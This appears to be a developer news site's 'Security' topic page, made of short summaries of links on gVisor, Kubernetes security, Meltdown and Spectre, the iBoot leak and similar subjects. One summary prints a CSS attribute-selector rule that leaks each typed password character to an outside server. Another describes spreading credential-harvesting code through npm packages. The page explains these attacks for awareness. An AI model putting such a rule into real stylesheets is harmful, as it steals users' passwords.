Security

InfoSec, DevSec, Penetration Testing, etc.
57 Stories

Zack Whittaker zdnet.com

I asked Apple for all my data. Here's what was sent back.

Zack Whittaker writes for Zero Day: Apple gave me all the data it collected on me since I bought my first iPhone — in 2010. This is what has largely stood out to me in the ongoing discussion about what data the four have on me and how they use it… As insightful as it was, Apple’s treasure trove of my personal data is a drop in the ocean to what social networks or search giants have on me, because Apple is primarily a hardware maker and not ad-driven, like Facebook and Google, which use your data to pitch you ads. Want to request your data? It takes just a few seconds…


Google

gVisor – a sandboxed container runtime

Why does this exist? Containers are not a sandbox. While containers have revolutionized how we develop, package, and deploy applications, running untrusted or potentially malicious code without additional isolation is not a good idea. The efficiency and performance gains from using a single, shared kernel also mean that container escape is possible with a single vulnerability. gVisor takes a distinct approach to container sandboxing and makes a different set of technical trade-offs compared to existing sandbox technologies, thus providing new tools and ideas for the container security landscape.


GitHub

⚡️ Let's Encrypt strikes again, this time in your GitHub Pages

Parker Moore, on GitHub’s blog: Today, custom domains on GitHub Pages are gaining support for HTTPS as well, meaning over a million GitHub Pages sites will be served over HTTPS. What’s more: We have partnered with the certificate authority Let’s Encrypt on this project. As supporters of Let’s Encrypt’s mission to make the web more secure for everyone, we’ve officially become Silver-level sponsors of the initiative. If your custom domain uses CNAME or ALIAS records, no action is required to go HTTPS. If (like me) you have a custom domain using A records, follow along here.


Kubernetes github.com

A best practice guide to Kubernetes security

K8s is a powerful platform which can be abused in many ways if not configured properly. Contributors to this guide are running Kubernetes in production and worked on several K8s projects to learn about security flaws the hard way. This guide scores major points for having battle-hardened contributors. I also dig how they indicate the severity/importance of each topic with an emoji. Look out for the 💥s!


Griffin Byatt github.com

Sobelow – a security-focused static analyzer for the Phoenix framework

Yesterday, Griffin Byatt hit me up in Slack and let me know we had a few security holes. 😱 After a quick discussion about the magnitude of said holes, he informed me that he’d found them by running our code through his static analysis tool, Sobelow. Say what? For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent the introduction of a number of common vulnerabilities. I asked Griffin if he’d be kind enough to open a PR with the fixes so we can link it up and use it to show folks how handy this tool is. So that’s what he did and that’s what I’m doing! 💚


Security jakearchibald.com

Third party CSS is not safe

Jake Archibald goes much deeper on our previous report of CSS key logging. Some folks called for browsers to ‘fix’ it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is ‘safe’. Jake shared many examples as well as ways to mitigate these types of attacks.


Security github.com

CSS key logging is a thing?! 😱

Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates input values on every keypress. Here’s how it works: utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image. Add some CSS that looks like this: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } When the user types an a into the password field, it will hit your server for logging. Dastardly!


iOS motherboard.vice.com

Someone published the source code to iBoot (a critical piece of iOS) on GitHub

This is being called “the biggest leak in history”, which is probably not true (remember when Gizmodo got its grubby paws on the iPhone 4?). But it’s likely the biggest leak in Apple software history. Motherboard says it… could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. That’s plausible. iBoot is responsible for ensuring a trusted boot of the O/S. The specific version posted was from iOS 9, but this portion of code probably doesn’t get updated as often as the Music app, so it’s likely still relevant. Apple promptly posted a DMCA takedown request, and the source code is no longer publicly available. But we developers know all too well that once source code is made public, there’s no taking it private again.


Security rdegges.com

Please stop using Local Storage

Randall Degges examines the good and bad uses of Local Storage. tl;dr: don’t use it to store sensitive data. Almost every day I stumble across a new website storing sensitive user information in local storage and it bothers me to know that so many developers are opening themselves up to catastrophic security issues by doing so. Let’s have a heart-to-heart and talk about local storage and why you should stop using it to store session data.


Medium

Meltdown and Spectre Explained

If some or most of what you’ve heard or read about Meltdown and Spectre has gone over your head, then you should 💯 read this technical explainer from Matt Klein (also known for being the creator of Envoy). Matt: I have not seen a good mid-level introduction to the vulnerabilities and mitigations. In this post I’m going to attempt to correct that by providing a gentle introduction to the hardware and software background required to understand the vulnerabilities, a discussion of the vulnerabilities themselves, as well as a discussion of the current mitigations. Matt goes on to share graphic charts of CPUs, virtual memory, and code samples to break down the exploit.


Security spectreattack.com

Meltdown and Spectre

Everything you need to know about the Meltdown and Spectre bug. Q: Am I affected by the bug? A: Most certainly, yes. Q: Can I detect if someone has exploited Meltdown or Spectre against me? A: Probably not. The exploitation does not leave any traces in traditional log files. Q: Which systems are affected by Meltdown? A: Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995. Uh oh. 😱


Hackernoon

I'm harvesting credit card numbers and passwords from your site. Here's how.

This is pretty scary regardless of whether it’s based on a true story or not. When I first wrote this code back in 2015, it was of no use at all sitting on my computer. I needed to get it out into the world. Out into your site. Lucky for me, we live in an age where people install npm packages like they’re popping pain killers. So, npm was to be my distribution method. I would need to come up with some borderline-useful package that people would install without thinking — my Trojan horse. Oh and then there was this — this is an excellent opportunity for taking over npm packages and injecting malware by malicious people.
